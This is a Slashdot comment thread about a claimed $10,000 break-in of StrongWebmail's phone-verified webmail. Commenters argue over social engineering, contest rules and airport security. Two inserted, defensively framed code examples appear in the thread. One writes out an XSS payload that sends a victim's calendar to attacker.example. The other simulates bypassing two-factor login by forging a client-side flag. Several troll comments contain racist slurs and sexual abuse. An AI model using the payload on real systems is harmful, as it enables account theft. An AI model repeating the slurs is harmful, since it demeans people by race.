
Hackers Claim $10K Prize For StrongWebmail Breakin

Soulskill posted more than 5 years ago | from the worth-their-while dept.

Security 193

alphadogg writes "Telesign, a provider of voice-based authentication software, challenged hackers to break into its StrongWebmail.com Web site late last week. The prize: $10,000. On Thursday, a group of security researchers claimed to have won the contest, which challenged hackers to break into the Web mail account of StrongWebmail CEO Darren Berkovitz and report back details from his June 26 calendar entry. The hackers, led by Secure Science Chief Scientist Lance James and security researchers Aviv Raff and Mike Bailey, provided details from Berkovitz's calendar to IDG News Service. In an interview, Berkovitz confirmed those details were from his account. However, Berkovitz could not confirm that the hackers had actually won the prize. He said he would need to check to confirm that the hackers had abided by the contest rules, adding, 'if someone did it, we'll kind of put our heads down.'"


193 comments


Hu? (5, Insightful)

ae1294 (1547521) | more than 5 years ago | (#28229477)

Wait I'm confused??? They expected the hackers to follow rules?

Re:Hu? (4, Interesting)

Allicorn (175921) | more than 5 years ago | (#28229599)

I'm thinking - if the hackers actually bribed/tricked the CEO's PA into just telling them what was in the calendar record then the guy is going to try to weasel out of paying.

As soon as you embed Linux in your ass let us know (-1, Troll)

bigblacknigger (1440657) | more than 5 years ago | (#28229637)

Make sure that it runs bash, vi, iptables, SSHd, Squid, Apache, MySQL and KDE, otherwise it doesn't count.

Re:As soon as you embed Linux in your ass let us k (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28229773)

Shut up you fucking nigger. KDE? Looks and acts like shit, just like you. It's the GUI embodiment of geeks who dont get any pussy.

"Hey, let's make things as needlessly ugly and needlessly complicated as possible!"

If you're going to be needlessly ugly then at least be a nigger - at least you'll have a footlong cock. Otherwise just shut the fuck up.

Recent versions of KDE are the result of a bunch of virgins getting together to decide the best way to get laid. Go GNIGGER. Go GNOME.

Re:As soon as you embed Linux in your ass let us k (-1, Troll)

gavron (1300111) | more than 5 years ago | (#28229803)

Bill Gates, stop drinking, take your meds, and quit posting on slashdot. You're not even trolling like anyone who can innovate. *LOL*

E

Re:Hu? (1)

Ethanol-fueled (1125189) | more than 5 years ago | (#28229691)

What parent may or may not imply is that it was an inside job with lots of external obfuscation.

Re:Hu? (5, Insightful)

MrMista_B (891430) | more than 5 years ago | (#28229729)

Social engineering is a perfectly valid and entirely effective method of hacking.

Re:Hu? (4, Insightful)

XanC (644172) | more than 5 years ago | (#28229775)

But it doesn't test their software.

Re:Hu? (4, Interesting)

ta bu shi da yu (687699) | more than 5 years ago | (#28229867)

Uh? According to NetworkWorld, "the IDG attack did not work initially, but succeeded when security software called NoScript was disabled on the Firefox browser, running on a Windows XP machine." wtf?

Re:Hu? (0)

Anonymous Coward | more than 5 years ago | (#28230091)

Wait, that sounds like it was a client-side attack on the CEO's machine. That also fails to test their email service.

Re:Hu? (1)

Jah-Wren Ryel (80510) | more than 5 years ago | (#28230495)

Wait, that sounds like it was a client-side attack on the CEO's machine. That also fails to test their email service.

Sounds like cross-site scripting to me. And if it can be done to the CEO to give others access to his account, then it can also be done to any other user and their account too. If the company doesn't take precautions against that form of exploit then they are vulnerable and ultimately the bad guys don't give a shit about how they get access, they just care about getting access.
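As an added illustration of the cross-site-scripting reading in the comment above (example code written for this page, not StrongWebmail's code and not the attack actually used in the contest; the sample message, the /calendar/2009-06-26 path and attacker.example are constructed stand-ins):

```python
"""Added example, not StrongWebmail's code: the kind of client-side hole the
comment above describes. Any script an attacker gets into a webmail page runs
inside the victim's browser, in a session that has already passed the phone
step, so it can read the calendar with the victim's own credentials. The
message, the endpoint path and attacker.example are constructed."""
import html
import re

# Constructed inbound message whose subject carries a payload. The script needs
# neither the password nor the phone: the victim's session cookie rides along with fetch().
SAMPLE_SUBJECT = ('Re: lunch <script>fetch("/calendar/2009-06-26").then(r=>r.text())'
                  '.then(t=>{new Image().src="//attacker.example/?"+encodeURIComponent(t)})</script>')
SAMPLE_BODY = "Are we still on for Friday? <b>Let me know</b>."


def render_message_unsafe(subject, body):
    """Vulnerable: untrusted fields are concatenated straight into the page."""
    return f"<h2>{subject}</h2><div class='body'>{body}</div>"


def render_message_safe(subject, body):
    """Hardened: every untrusted field is escaped for HTML text context.
    quote=True also escapes quotes, so the same helper is safe inside attributes."""
    return (f"<h2>{html.escape(subject, quote=True)}</h2>"
            f"<div class='body'>{html.escape(body, quote=True)}</div>")


_ACTIVE_CONTENT = re.compile(r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def contains_active_content(rendered_html):
    """Test-time tripwire, not a sanitizer: True if a script tag, an inline event
    handler or a javascript: URL survived rendering."""
    return _ACTIVE_CONTENT.search(rendered_html) is not None


def csp_header():
    """Defence in depth for users who do not run NoScript: forbid inline and
    third-party script and plugins so an injected payload has nowhere to run."""
    return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"
```

Escaping everything, as render_message_safe does, also kills the legitimate &lt;b&gt; in the body; a service that must display HTML mail needs an allowlist sanitizer for the body instead, and the Content-Security-Policy header backs up escaping rather than replacing it.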

Re:Hu? (3, Insightful)

Allicorn (175921) | more than 5 years ago | (#28230033)

That wasn't the whole challenge. The challenge was to access an account on their allegedly super-secure webmail service. If the software is fairly solid but the staff are easily duped/bribed... how secure is the service?

Even if social engineering alone resulted in getting access to the prize data, then the challenge has still been met: StrongWebmail.com - the service - is not secure.

Re:Hu? (0)

XanC (644172) | more than 5 years ago | (#28230135)

Well, suppose they bribed or tricked the CEO's secretary. She has the CEO's email password, not because she works for StrongWebmail.com, but because she's his secretary.

That kind of attack has nothing to do with the service, since she wouldn't have everybody else's password too. And it would work against pretty much any (gullible or corrupt) secretary, regardless of the system or security.

Re:Hu? (4, Insightful)

C18H27NO3 (1282172) | more than 5 years ago | (#28229847)

agreed.
In the real world I'm not going to care HOW my secret correspondence was hacked when they assured me it would never happen.
"They got in through a vulnerability in our OS, but our software held up".
"Someone in our company helped themselves/someone else to your mails, but our software held up".
"Someone installed a trojan that compromised the authentication system, but our software held up".

I understand perfectly what they are trying to achieve with this contest but they come off as sounding as if any other means of obtaining 'secure' information is beyond their liability when they state that it is the most secure webmail system out there.
There are many different levels to security that need to be continually addressed yet they seem to think that as long as their little solo phone app doesn't get compromised then it's not really their fault.
At least that's the way the rules and TFA sound.

Re:Hu? (5, Informative)

jesseck (942036) | more than 5 years ago | (#28229831)

While I agree that social engineering is a very legit way to hack a system, the terms of the challenge (link here [strongwebmail.com]) state that "You may not work with an employee, partner, or owner of StrongWebmail.com or any of its affiliates or partners to accomplish the email hack." Since this was StrongWebmail's contest, they make the rules. Even if the rules prevent a common method of hacking from taking place. On the other hand, people are quite often the weak link... by preventing the contestants from using this "easy" entry point (say, a janitor or secretary), they can test the technical system itself.

Re:Hu? (1)

C18H27NO3 (1282172) | more than 5 years ago | (#28229949)

"You may not work with an employee, partner, or owner of StrongWebmail.com or any of its affiliates or partners..." I interpret that as colluding or conspiring with them is forbidden when in fact social engineering would technically be 'working against them'.

Re:Hu? (1)

GumphMaster (772693) | more than 5 years ago | (#28230643)

Am I alone in thinking that: "work with an employee..." != "dupe an employee"?

If these guys managed to get in by conning an unknowing employee then they can hardly be claimed to have been working together. They are no more working together than the way a con-man "works with" their victim. It's largely moot anyway, which employee is going to say, "Hey boss, I let them have the information."? Severely career limiting methinks.

Re:Hu? (3, Informative)

capnkr (1153623) | more than 5 years ago | (#28230069)

FTFA (page 2, first paragraph):

James said that these contests might be fun, but they don't provide a realistic measure of real security because they are encumbered with rules. The StrongWebmail contest prohibits working with a company insider, for example.

Re:Hu? (3, Insightful)

Tubal-Cain (1289912) | more than 5 years ago | (#28229623)

I could understand if they don't want to pay up to someone that hacked something other than their software. Exploiting a Windows bug may count if they are not cross-platform, but bribing the janitor probably doesn't. Yes, a real cracker may hack one of this product's customers that way, but Telesign couldn't be at fault for that.

Re:Hu? (1)

iamhassi (659463) | more than 5 years ago | (#28229739)

"Exploiting a Window bug may count if they are not cross-platform may count, but bribing the janitor probably doesn't."

The hell it doesn't! If hackers can pay the janitor or other employee a few bucks to access the CEO's email then I wanna know that before I hand StrongWebmail $$$ to handle my email. That's like saying social engineering [wikipedia.org] doesn't count. Of course it counts, the end results were the same, right?

Re:Hu? (4, Interesting)

Tubal-Cain (1289912) | more than 5 years ago | (#28230157)

The hell it doesn't! If hackers can pay the janitor or other employee a few bucks to access the CEO's email then I wanna know that before I hand StrongWebmail $$$ to handle my email.

That depends on what they are providing. If they are providing a hosting service of some sort, then bribing a janitor counts. If they are providing a system to be handled by the local network admins (that's the impression I get), then it shouldn't. The janitors there are not the janitors that will be around the customers' servers.

Re:Hu? (3, Insightful)

nine-times (778537) | more than 5 years ago | (#28230007)

Why shouldn't bribing a janitor count? If I'm paying someone to call me every time I want to log into my email, then I'm probably pretty paranoid about security and don't want other people gaining access to my email. If security is so bad that random employees (including the janitor) can read my email, and those employees are so untrustworthy that they can be easily bribed, then that's just as real of a security problem as if their software were flawed.

Security is often only as strong as its weakest point. If the point of this prize was to prove that your email is secure on their servers, then gaining unauthorized access to other people's email on their servers should be enough to claim the prize.

Re:Hu? (1)

Tubal-Cain (1289912) | more than 5 years ago | (#28230209)

I got the impression this is meant to be a locally-administered system rather than a remote one. I would have a hard time blaming Microsoft for a social engineering-based security breach of a MS Exchange setup, though I would not hesitate to lampoon them for such a breach at Hotmail.

Re:Hu? (2, Informative)

innocent_white_lamb (151825) | more than 5 years ago | (#28230325)

Your impression is wrong. I just looked at their website. They're offering a webmail service like Yahoo or Gmail -- the difference is that they phone you with an access code at a pre-determined phone number every time you want to access your email account.

Re:Hu? (1)

maxwells_deamon (221474) | more than 5 years ago | (#28229787)

I suspect and hope that the statement was just a way to delay until the person in charge of the contest (some committee perhaps) officially confirms the win so that the check can be written.

that said, if you set something like this up with no rules you are being quite dumb.

for instance you can not violate law, don't ambush employees in the parking lot with weapons. Don't physically break into the building, don't download the employee database...

Re:Hu? (3, Insightful)

ae1294 (1547521) | more than 5 years ago | (#28229839)

Honestly what I find extremely funny is that they already know they have a security problem and that these hackers have some sort of access.

Are they really going to try and piss them off and not pay up?

Rules? (0, Redundant)

Anonymous Coward | more than 5 years ago | (#28229485)

Rules? LOL.. Ok just as long as all hackers abide by the rules I'm sure all our information is safe :)

Telegraphing (4, Insightful)

inviolet (797804) | more than 5 years ago | (#28229491)

The size of the prize -- $10,000 -- indicates that the company thought it reasonably possible that they'd get hacked, and/or desired to avoid motivating any serious hacking attempt. Neither explanation gives me much confidence in their product.

And wow did it ever backfire. Normally they do these kinds of promotions in the hopes that nobody will bother, so that the company can later say "We offered a wheelbarrow of cash, and still nobody hacked us!". As if that was equivalent to a real security audit.

Re:Telegraphing (5, Insightful)

Alethes (533985) | more than 5 years ago | (#28229525)

Maybe I'm naive, but I figure StrongWebmail.com might be the best webmail site to use for security right now because they're in a heightened state of alert. Kinda like flying right after 9/11.

Re:Telegraphing (-1, Flamebait)

Anonymous Coward | more than 5 years ago | (#28229633)

Maybe I'm naive, ...

Yes. You are naive.

Re:Telegraphing (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28229863)

Dickhead.

Re:Telegraphing (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28229991)

Technically, a dickhead will have a much bigger penis than you or I can ever dream of.

On top of that, he will have a tongue on the dick, thus allowing penetration and licking of the clit at the same time.

Thus a dickhead can provide a woman with levels of pleasure far above anything we can come up with.

Re:Telegraphing (3, Insightful)

gavron (1300111) | more than 5 years ago | (#28229641)

There was nothing done after 9/11 to raise the level of security for the flying public. That includes the period right after 9/11 up to and including today. Everything that was done was in the spirit of "security theater" (credit: Bruce Schneier).

Strongmail isn't the "best" (whatever criteria you use for "best") webmail site for "security" (whatever your definition of "security"). It's proven that it's easily cracked, and that is in and of itself a stay-away sign.

I highly recommend Bruce's blog at http://www.schneier.com/blog/ [schneier.com] .

E

Re:Telegraphing (1, Insightful)

Moridineas (213502) | more than 5 years ago | (#28229687)

There was nothing done after 9/11 to raise the level of security for the flying public. That includes the period right after 9/11 up to and including today. Everything that was done was in the spirit of "security theater" (credit: Bruce Schneier).

That is such incredible BS. Disregarding the heightened awareness of airport personnel and stricter rules for metal detection, body pat downs, and newer equipment, what about air marshals? You can't possibly claim that undercover air marshals are "security theater."

Yeah, some of it is no doubt security theater, that's not in dispute...who says security theater isn't effective?

Re:Telegraphing (3, Insightful)

gavron (1300111) | more than 5 years ago | (#28229733)

"Heightened awareness" of untrained personnel yield more chaos and more chaffe, not more data. Sorry.

Body pat downs are security theater. The 9/11 terrorists didn't have boxcutters on them nor would that have been found in a pat down.

Newer equipment has only been installed in test markets to do the "puff" test. It detects gunpowder or explosive residue. Neither the "liquid explosive" (myth) nor the boxcutters can be detected by it.

Under-cover air-marshals board first, and keep their jackets on. IF THEY WERE ADEQUATELY TRAINED, NOT CORRUPT (see many news stories to the contrary) then they might make a difference but not for any real scenarios.

You forgot to mention "reinforced cockpit doors" and "not congregating at the toilet." These also, like the former, do not prevent a terrorist with a boxcutter from putting it to the throat of a flight attendant (and four of them doing so to all four flight attendants) and threatening to kill them all.

Before you argue whether such an attack would be successful -- consider this -- if they can do it (which they can) then security since 9/11 has not increased which is exactly what I said.

"Who says security theater isn't effective?"

It's effective as mediocre entertainment if someone you don't like has to go through it.

It's not effective as security.

Best regards

E

Re:Telegraphing (2, Insightful)

michaelhood (667393) | more than 5 years ago | (#28230001)

You started to touch on the one thing that has changed that matters, IMO. And that's largely a policy change.

We used to operate under the assumption that would-be hijackers wanted political attention and/or money. Now we operate under the assumption they are willing to die if it means inflicting more casualties. This means we will never again open the [now reinforced] cockpit doors in any circumstances when there is a hostile scenario in the cabin.

So all of this talk about box-cutters and other mythical impromptu melee weapons is a false dilemma. This is no longer a viable threat. Virtually all threats to be considered at this point are ones capable of causing harm to a large number of passengers in the passenger cabin (firearms), or causing the plane to crash (explosives). There are of course fringe cases, but all things must be a balance of convenience/accessibility and security.

Re:Telegraphing (2, Insightful)

gavron (1300111) | more than 5 years ago | (#28230047)

That's a red herring. Today's pilots don't know whether the terrorist of tomorrow wants to use the plane as a weapon (as did the one occurrence in 2001) or whether they have other goals they wish to accomplish. These same N terrorists (pick a number -- the lack of security won't prevent ten boxcutters from being brought on board any more than they'd not prevent 4 being brought on board) can threaten a LARGE number of innocent women, children, and men.

Pilots will likely respond and land the plane. Sure, it won't be used as a weapon (but that was the 8-year-old plan... not tomorrow's plan). They can still get hundreds of hostages.

Going back to my original point. THERE IS NO MORE SECURITY TODAY. The Pilots' attitude is not a result of heightened security nor better screeners, nor the creation of DHS nor anything else.

Again, the web site does not provide stronger security. The airlines do not provide stronger security. There is equal lack of realism in saying "I'd rather fly now than before 2001" as "I'd rather trust strongwebmail now rather than before they were hacked." Neither has improved their security.

E

Re:Telegraphing (0)

capnkr (1153623) | more than 5 years ago | (#28230121)

Wrong. There IS more security today. Lots of it - just go to an airport and look.

Security [thefreedictionary.com] definition. Check 3(b).

That said - the efficaciousness of said can be brought into doubt, but the fact that there is more of it (or at least, an attempt at such) cannot.

No matter how much you believe to the contrary. Sorry, but you might want to put more thought into how you are phrasing/making your argument. This is a tough crowd. ;)

Re:Telegraphing (1)

gavron (1300111) | more than 5 years ago | (#28230149)

Thanks for the definition. It confirms there's no more security. There's just the appearance of same.

See my post (grandparent's parent) on "Security theater."

It has nothing to do with beliefs. Security is a fact, or in this case a fact of nonexistence.

"This is a tough crowd"

Work harder to convince them then.

The facts speak for themselves.

It's now Friday night. Have a good one. Try not to be confused by the appearance of something vs the real thing.

E

Re:Telegraphing (1)

capnkr (1153623) | more than 5 years ago | (#28230309)

I'm not confused or tricked in the least - quite the contrary, in fact.

Parse the 'security' definition a little further and/or with more care; in particular, pay attention to the use of the word "assure", as opposed to "ensure", which, based on how you are arguing this point, seems to be your expectation of what is implicit in the term and/or idea of 'security'.

Security (3) reads: "Something that gives or assures safety,"

The first half of Assure [thefreedictionary.com] defined states:

1. To inform positively, as to remove doubt. 2. To cause to feel sure. 3. To give confidence to; reassure.

I do understand the point you are trying to make, and why. In fact, we are likely largely in agreement. I am simply pointing out that the statements you are making are overbroad and general, and that you could make them more effective in order to get the point across.

Have a good Friday evening yourself. :)

Re:Telegraphing (0, Flamebait)

Jah-Wren Ryel (80510) | more than 5 years ago | (#28230507)

Wrong. There IS more security today. Lots of it - just go to an airport and look.

Security definition. Check 3(b).

Wooo-hoo! Dictionary flame! You are kicking ass in this fight!
Semantic dickweed for the win!

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230131)

That policy change happened before the day was out, even - as evidenced by a field in Pennsylvania. An airliner in the US will never be hijacked again.

Re:Telegraphing (3, Insightful)

gavron (1300111) | more than 5 years ago | (#28230169)

"An airliner in the US will never be hijacked again."

Sadly, sir, you are incorrect.

E

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230199)

Do you honestly think a planeful of people are going to let someone take over the controls, regardless of what weapon he might have?

That's not happening - it simply won't. They'd have to kill everyone on the plane.

Re:Telegraphing (1)

gavron (1300111) | more than 5 years ago | (#28230223)

No, they'd kill one flight attendant, then grab another one by the neck and ask "Who wants to come up and be next."

All the little wanna be heroes would remain seated.

thanks for the question. Off to enjoy my weekend. There are no terrorists nor fake would-be security in my weekend.

Best regards,

E

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230263)

Just out of curiosity, have you ever been in a situation that involved the use of deadly force?

Re:Telegraphing (4, Informative)

Anonymous Coward | more than 5 years ago | (#28229901)

You think awareness will help to any degree? Awareness of what, and how does that equal greater security? I worked at a major airline before and for about 5 months after 9/11. I worked at an airline and at an airport that was used by the 9/11 terrorists. Things may seem to have changed, but if you knew anything about the operations at an airport, it was smoke and mirrors. Maybe things have changed since then, so I cannot comment.

On another note, I now live and work in DC. I see cars being checked before pulling into parking garages of important buildings. A security guard walks around the car with a mirror on a stick and checks the underneath of the cars before allowing entry. You call that increased security? Paint your bomb with undercoating or put it in the trunk, in your engine bay, or hell, even in the back seat. As long as it does not have flashing lights and does not say "EXPLOSIVE" on it, they would never know.

You want to know what heightened awareness there is? Remember this incident? http://en.wikipedia.org/wiki/2007_Boston_Mooninite_Scare [wikipedia.org]
It had lights and wires, it must be a bomb. You feel safe with that level of awareness? I don't.

Re:Telegraphing (1)

lwsimon (724555) | more than 5 years ago | (#28230123)

I was on a flight last night, actually, and looked over to see a fire extinguisher behind the last row of seats.

I can't take nail clippers on the plane (because I might hijack it!), but it's okay to leave a fire extinguisher sitting there. Ever see someone sprayed with a fire extinguisher?

If America was a truly free country still, 9/11 would have ended with a bunch of terrorists with gunshot wounds.

Re:Telegraphing (1)

Mad Merlin (837387) | more than 5 years ago | (#28230139)

Yeah, some of it is no doubt security theater, that's not in dispute...who says security theater isn't effective?

Security theater is worse than no security at all.

Re:Telegraphing (1)

bitt3n (941736) | more than 5 years ago | (#28229975)

Maybe I'm naive, but I figure StrongWebmail.com might be the best webmail site to use for security right now because they're in a heightened state of alert. Kinda like flying right after 9/11.

I'm building a webmail service packed with so many sql injection opportunities that it gets hacked by accident, just so you can put your mind at ease.

Re:Telegraphing (0)

Anonymous Coward | more than 5 years ago | (#28230341)

Bahaha, this ain't no amusement park ride kid

Re:Telegraphing (1)

Foodie (980694) | more than 5 years ago | (#28229759)

$10,000 is not a bad price to pay for that much publicity. Too bad they got hacked in such a short amount of time.

Re:Telegraphing (4, Funny)

bitt3n (941736) | more than 5 years ago | (#28229969)

The size of the prize -- $10,000 -- indicates that the company thought it reasonably possible that they'd get hacked, and/or desired to avoid motivating any serious hacking attempt. Neither explanation gives me much confidence in their product.

And wow did it ever backfire. Normally they do these kinds of promotions in the hopes that nobody will bother, so that the company can later say "We offered a wheelbarrow of cash, and still nobody hacked us!". As if that was equivalent to a real security audit.

Perhaps they'll fix their software by simply offering a lower prize.

"Hack our software, and win a free small soda with purchase of any McDonald's value meal!"

Re:Telegraphing (1)

capnkr (1153623) | more than 5 years ago | (#28230129)

+1 Funny. :)

Interesting approach (3, Insightful)

l2718 (514756) | more than 5 years ago | (#28229541)

Offering bounties is a great approach to finding bugs in your code. The crackers are taking quite a legal risk, however -- what if the owner of the computer decided that they "exceeded the hacking authorization"?

Re:Interesting approach (4, Insightful)

The MAZZTer (911996) | more than 5 years ago | (#28229559)

As long as they followed the rules, in theory they could probably defend themselves quite well in court considering the whole thing with the prize money and the offer. It's a bit hard to claim that someone illegally hacked into your system when a) you invited anyone to hack it and b) you laid out rules WHICH THEY FOLLOWED.

Put the Vi.agr.a team on it!!! (0)

Anonymous Coward | more than 5 years ago | (#28229553)

They'll break it. Guaranteed. Or your money back.

This is obvious (5, Insightful)

empesey (207806) | more than 5 years ago | (#28229577)

If the idea is to determine whether it can be cracked, why are there rules? Whether they followed some self-imposed rules or not, it still indicates that there is a weak link in the armor.

Re:This is obvious (1, Funny)

Anonymous Coward | more than 5 years ago | (#28229745)

, it still indicates that there is a weak link in the armor.

That's not the preferred nomenclature. Asian-american, please.

Re:This is obvious (1, Informative)

Anonymous Coward | more than 5 years ago | (#28229985)

This joke wasn't immediately apparent to me. If it isn't to anybody else, then my advice to them is to try to imagine synonyms for "weak link" as it applies to armour.

Re:This is obvious (0)

Anonymous Coward | more than 5 years ago | (#28230409)

You found the chink in my armor!

The Catch (5, Informative)

LSDelirious (1569065) | more than 5 years ago | (#28229613)

from StrongWebmail's Site [strongwebmail.com]

There's just one catch: to access a StrongWebmail.com email account, the account's owner must receive a verification call on his pre-registered phone number. So even though you have our CEO's username and password, you still have some work to do because you don't have access to his telephone. If you do manage to be the first person to break into his email account, there's $10,000 in it for you - just register below to get started. Good luck!

So they have to hack the phone company's system too, or find a way to clone his cellphone, so they can intercept the call and approve access? They might be cool with having their own systems hacked, but it sounds like they are now involving a phone company, which might not be too thrilled to be a part of their little game - the only way around that I can see is to hack the StrongWebmail system to change the "pre-registered" phone number....

and who the hell wants an email account you have to approve via phone call every time you login?!? What if your phone is lost/broken/dead/no reception/etc.. then you have no way in

Re:The Catch (2, Funny)

Tubal-Cain (1289912) | more than 5 years ago | (#28229649)

Telesign, a provider of voice-based authentication software...

Sounds like something for protecting a phone system.

Re:The Catch (3, Funny)

michaelhood (667393) | more than 5 years ago | (#28230015)

My voice is my passport; verify me.

Full Details (0)

LSDelirious (1569065) | more than 5 years ago | (#28229651)

here: Official Contest Rules, Terms, and Conditions

Re:Full Details (5, Informative)

LSDelirious (1569065) | more than 5 years ago | (#28229675)

Re:Full Details - or 'Contest can not be won' (1)

daryl_and_daryl (1005065) | more than 5 years ago | (#28230569)

You can not use a computer, telephone, or any tool of any type.
From the rules:

"Detailed information about how you accomplished the hack - we must be able to reproduce the hack by reading your explanation"

So if you did anything more than read an explanation - you have not followed the rules.

Re:Full Details - or 'Seriously you can not win' (1)

daryl_and_daryl (1005065) | more than 5 years ago | (#28230669)

Again the rule :
Detailed information about how you accomplished the hack - we must be able to reproduce the hack by reading your explanation

StrongWebmail hacking method used in contest

1. Reset the entire StrongWebmail system to its condition as of 02 June 2009 @ 14:00:00 UTC
2. Call (XXX) YYY-ZZZZ on 02 June 2009 @ 14:00:30 UTC
3. Ask for Bob and follow his instructions (where Bob is not someone excluded from the contest)

They could never do that, but they also can not show that it would fail.
Do I get the prize or not ?

Re:The Catch (3, Insightful)

Gi0 (773404) | more than 5 years ago | (#28229653)

If I could hack the phone company's system, or find a way to clone their CEO's cellphone, besides hacking their system, would I be willing to let them know for just 10 grand? Nope. That knowledge has got to be more precious.

Re:The Catch (2, Insightful)

Jaime2 (824950) | more than 5 years ago | (#28229753)

Or hack the authentication system so that it thinks you already went through all that stuff when all you did was forge an authentication proof. Their system is very resistant to some types of attacks, like password guessing. But it is no stronger than a normal username and password against most attacks on the system itself. StrongWebmail.com's biggest mistake was thinking that they knew of all of their weaknesses.
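The phone-call step quoted from the contest page ("the account's owner must receive a verification call on his pre-registered phone number") and the forged-proof failure mode in the comment above, as one added example written for this page. It is not StrongWebmail's or Telesign's code: the user record, password, phone number, mailbox contents and the stand-in phone gateway are all constructed, and the two server classes are hypothetical designs, not a description of the real service.

```python
"""Added example, not StrongWebmail's or Telesign's code. A phone-call second
step recorded two ways: WeakServer stores "call passed" in a client-held flag it
later trusts; StrongServer keeps that state server-side, bound to one login
attempt, with expiry, an attempt limit and session-id rotation. Users, phone
number, mailbox contents and the phone gateway are constructed stand-ins."""
import hashlib
import hmac
import secrets

CODE_TTL_SECONDS = 120
MAX_CODE_ATTEMPTS = 5
# As in the contest, assume the attacker already holds the password.
USERS = {"ceo": {"password": "correct horse", "phone": "+1-555-0100"}}
MAILBOX = {"ceo": ["2009-06-26: (constructed calendar entry)"]}
# Stand-in for the voice provider: a dict of phone number -> last code read out.


def password_ok(user, password):
    stored = USERS.get(user, {}).get("password", "")
    return hmac.compare_digest(stored.encode(), password.encode())


class WeakServer:
    """Vulnerable: the call is placed, but the only proof it was answered is a
    flag in the client's cookie jar, so forging the flag skips the phone."""
    def login(self, user, password, phone_gateway):
        if not password_ok(user, password):
            return None
        phone_gateway[USERS[user]["phone"]] = "1234"
        return {"user": user, "phone_verified": "0"}

    def mailbox(self, cookies):
        return MAILBOX[cookies["user"]] if cookies.get("phone_verified") == "1" else None


class StrongServer:
    """The client only ever holds an opaque id; verification state lives on the
    server, keyed by that id, and is consumed on the first success.
    `now` is a caller-supplied clock in seconds so that expiry is testable."""
    def __init__(self, phone_gateway):
        self.gateway = phone_gateway
        self.pending = {}    # sid -> {user, code_hash, expires, tries}
        self.sessions = {}   # sid -> user, present only after the code was verified

    def login(self, user, password, now):
        if not password_ok(user, password):
            return None
        code = f"{secrets.randbelow(10**6):06d}"
        sid = secrets.token_urlsafe(32)
        self.pending[sid] = {"user": user, "tries": 0, "expires": now + CODE_TTL_SECONDS,
                             "code_hash": hashlib.sha256(code.encode()).digest()}
        self.gateway[USERS[user]["phone"]] = code
        return sid

    def verify(self, sid, code, now):
        attempt = self.pending.get(sid)
        if attempt is None:
            return None
        if now > attempt["expires"] or attempt["tries"] >= MAX_CODE_ATTEMPTS:
            del self.pending[sid]          # expired or exhausted: back to the password step
            return None
        attempt["tries"] += 1
        if not hmac.compare_digest(attempt["code_hash"], hashlib.sha256(code.encode()).digest()):
            return None
        del self.pending[sid]
        new_sid = secrets.token_urlsafe(32)  # rotate the id when privilege changes
        self.sessions[new_sid] = attempt["user"]
        return new_sid

    def mailbox(self, sid):
        user = self.sessions.get(sid)
        return MAILBOX[user] if user else None


def attacker_reads_mail_weak():
    """Password only, no phone: forge the client-side flag."""
    srv, gateway = WeakServer(), {}
    cookies = srv.login("ceo", "correct horse", gateway)
    cookies["phone_verified"] = "1"
    return srv.mailbox(cookies) is not None


def attacker_reads_mail_strong():
    """Password only, no phone: the pre-verification id opens nothing and wrong
    codes are cut off after MAX_CODE_ATTEMPTS. Guesses are filtered against the
    real code only so that the outcome is deterministic."""
    gateway = {}
    srv = StrongServer(gateway)
    sid = srv.login("ceo", "correct horse", now=1000.0)
    if srv.mailbox(sid) is not None:
        return True
    real = gateway["+1-555-0100"]
    guesses = [c for c in ("000000", "111111", "123456", "654321", "999999", "000001", "777777") if c != real]
    return any(srv.verify(sid, g, now=1001.0) is not None for g in guesses[:MAX_CODE_ATTEMPTS + 1])


def owner_reads_mail_strong(delay_seconds=10.0):
    """The account owner answers the call and enters the code; fails once the TTL has passed."""
    gateway = {}
    srv = StrongServer(gateway)
    sid = srv.login("ceo", "correct horse", now=1000.0)
    new_sid = srv.verify(sid, gateway["+1-555-0100"], now=1000.0 + delay_seconds)
    return new_sid is not None and srv.mailbox(new_sid) is not None
```

The point of the contrast is where the proof lives: in WeakServer the phone is called but nothing ties the outcome of the call to the session, so the check is only as strong as the client's honesty; in StrongServer an attacker with the password gets an id that opens nothing, has five wrong guesses before the attempt is discarded, and a code that stops working after two minutes. None of this helps against script already running in the owner's verified session, which is the separate problem the NoScript detail in this thread points at.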

Blackjacking's been around for awhile (2, Informative)

sgt_doom (655561) | more than 5 years ago | (#28229805)

Hacking (or blackjacking, to use the vernacular) cells has been in existence for quite awhile, with probably Thai coders taking the lead, with Chinese, Americans, Germans and Brits coming up from the rear.....

Re:Blackjacking's been around for awhile (4, Funny)

grcumb (781340) | more than 5 years ago | (#28229987)

Hacking (or blackjacking, to use the vernacular) cells has been in existence for quite awhile, with probably Thai coders taking the lead, with Chinese, Americans, Germans and Brits coming up from the rear.....

That must be uncomfortable for the Thais...

... What? Oh! 'Coming up from the rear.' Forget I said anything.

Re:The Catch (1)

mysidia (191772) | more than 5 years ago | (#28229845)

Or find a bug in the webmail system that lets them get through without access to the phone number, or lets them prevent or redirect the call.

At one extreme... figure out how their system works, how it makes its outgoing calls, and one night, install some passive "taps" outside their building to capture the outgoing call when they attempt to login....

Password are bad for security. (1)

mcrbids (148650) | more than 5 years ago | (#28230597)

Passwords are a bad means of securing a computer. Sure, passwords are a far cry more secure than no authentication at all, but they do have some pretty severe limitations...

1) Any breach of a password pretty much kills them. Dead. If your ex-GF/BF gets the password to your webmail account, god help you, because the password in their hands works just as well as in yours.

2) Usually you don't have any (obvious) way of knowing that the breach occurred.

3) Because of (1) and (2), they are highly vulnerable to social engineering attacks: just convince somebody to give the password and it's game over. And it doesn't have to be you: it could be the system administrator, somebody at the help desk, you name it.

So they have to hack the phone company's system too, or find a way to clone his cellphone, so they can intercept the call and approve access?

Yes. That's the point, and it's a good point, too. This is a good step towards improving security, and I've toyed with doing something similar with our web-based product. Basically, the idea goes like this:

1) End user enters login name, clicks the "next" button.

1a) (in the background, a text message is sent to user's cell phone, with a code tied to the account and to the specific login session)

2) End user enters password, clicks the "next" button.

2a) (password verified against login account)

3) End user enters code that they've received on their phone, click next

3a) (system compares login, password, session, and entered code. If they all match, user is allowed through.)

